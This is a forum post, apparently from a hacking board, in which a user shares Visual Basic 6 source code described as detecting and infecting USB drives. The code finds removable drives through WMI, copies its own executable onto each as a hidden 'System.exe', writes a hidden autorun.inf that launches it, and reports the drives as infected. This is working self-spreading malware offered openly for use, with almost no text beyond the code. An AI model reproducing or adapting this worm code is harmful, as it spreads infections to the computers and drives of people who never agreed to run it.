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[VB6] Infect USB

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[VB6] Infect USB

Author: mikeh18

Hello all,

Here's some modified code i made for detect + infect USB drives using autorun

Sub Main()
On Error Resume Next
'Object and Strings
Dim WMIService As Object, USBDrives As Object, USBFound As Object, USB As String, USBCount As String

Set WMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") 'Open WMIService
Set USBDrives = WMIService.ExecQuery("Select * from Win32_LogicalDisk") 'Look For Computer Drives drives

For Each USBFound In USBDrives 'Look for all our drives

If USBFound.DriveType = 2 Then 'If drivetype is USB
USB = USBFound.Name 'Set USB as New USB-name
USBCount = USBCount & " - " & USBFound.Name 'Add USB name to USB-count
End If

If USB = "" Then GoTo volgende 'If its not an USB-Drive then goto Next
FileCopy App.Path & "\" & App.EXEName & ".exe", USB & "System.exe" 'Copy File to New USB Drive
Open USB & "autorun.inf" For Output As #1 'Create a Autorun file
Print #1, "[autorun]" 'Put Right Settings in it
Print #1, "open=System.exe" 'Put Our exe-name in It
Close #1 'Close the Autorun File
SetAttr USB & "System.exe", vbHidden ' vbHidden 'Hide our Exe File
SetAttr USB & "autorun.inf", vbHidden 'Hide the Autorun File

volgende: 'Next
Next 'Search for more USB drives

MsgBox "USB Drives: " & USB & vbNewLine & "Successfull Invected!", vbInformation, "USB Infect" 'Msg When Done
End Sub


Sursa: [VB6] Infect USB

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